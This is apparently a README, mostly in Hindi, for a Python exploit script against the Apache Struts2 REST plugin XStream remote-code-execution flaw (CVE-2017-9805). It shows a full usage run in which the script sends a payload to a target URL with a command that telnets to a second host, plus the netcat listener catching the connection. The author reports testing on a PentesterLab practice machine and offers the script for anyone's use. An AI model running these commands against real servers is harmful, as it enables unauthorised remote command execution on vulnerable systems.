
Exploit script for Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805)
संसाधन: * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805
एक पायथन शोषण स्क्रिप्ट जो S2-052 के लिए असुरक्षित Struts2 होस्ट करने वाले सिस्टम के शेल में रिमोट कमांड निष्पादित करने में सक्षम है।
╭─root@blackshell ~/
╰─# python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"
[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.
╭─zc00l@blackshell ~/
╰─$ nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned
pentesterlab के s2-052 अभ्यास की असुरक्षित मशीन पर परीक्षण किया गया।
यह शोषण स्क्रिप्ट मेरे द्वारा (zc00l) लिखी गई है और किसी के भी द्वारा उपयोग की जा सकती है।
यदि आप इस स्क्रिप्ट का उपयोग या संशोधन करना चाहते हैं, तो कृपया पहले से किए गए किसी भी कार्य का उचित श्रेय दें।